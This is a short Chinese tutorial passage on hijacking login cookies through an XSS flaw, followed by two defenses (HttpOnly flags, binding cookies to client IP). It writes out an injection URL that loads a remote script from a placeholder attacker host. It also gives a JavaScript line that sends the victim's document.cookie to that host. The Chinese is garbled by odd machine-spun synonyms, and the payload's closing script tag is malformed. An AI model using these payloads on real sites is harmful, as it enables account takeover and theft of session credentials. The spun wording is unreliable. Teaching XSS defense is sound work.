有人就会问了:So,进入管理中央有又什么用呢?
进入管理中央就可以操作修正用户的个人信息,可以说是为所欲为。
有人就又问了:改就改吧,只要不改密码,随便改。
是的,现在大部分的网站,在用户修正密码时,须要用户输入原始密码,因此通过Cookie挟制,无法修正密码,但是如果黑客在你的管理中央,删博客,发帖,揭橥不当辞吐,你是不是就紧张?轻则丢失数据,重则被请去喝茶,是不是开始害怕了?
好了,下边我就开始理解一下,利用XSS,完成Cookie挟制的流程。
第一步:
首先,我们利用的XSS漏洞,加载一个远程的JS文件。
http://localhost:82/xxs-case1.php?param=<script src=http://www.hackerserver.com/xss.js><script>
第二步:
在xss.js里面,获取当前用户在当前网站的Cookie,并发送到恶意做事器。代码如下:
var img=document.createElement("img");img.src="http://www.hackerserver.com/cookielog?"+escape(document.cookie);document.body.appendChild(img);
第三步:
由于,当前的Web运用中,大部分的都是用Cookie来保存用户的登录凭据的,因此可以利用挟制到的的Cookie,不须要密码登录 ,访问用户的管理中央。
总结有人问了,Cookie挟制这么危险,有没有有效的防御方法,答案是肯定的。
(1)设置HttpOnly 标识。给Cookie加上HttpOnly标识之后,恶意JS脚本就无法访问到浏览器里面存储的Cookie信息,从而有效的降落了Cookie被挟制的可能性。
(2)绑定客户端IP。后台把用户的Cookie和用户登录时的客户端IP绑定在一起,如此一来,就算Cookie被挟制,黑客也无法利用挟制到的Cookie登任命户管理中央。